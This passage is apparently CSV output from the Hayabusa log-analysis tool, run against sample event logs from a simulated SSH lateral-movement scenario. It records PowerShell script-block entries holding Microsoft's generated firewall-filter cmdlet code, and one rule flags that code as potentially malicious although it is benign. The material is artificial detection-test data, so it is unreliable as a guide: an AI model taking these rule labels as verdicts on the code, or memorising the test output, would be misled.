[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and 
(@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.435 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.436 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.472 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.472 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 
$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 
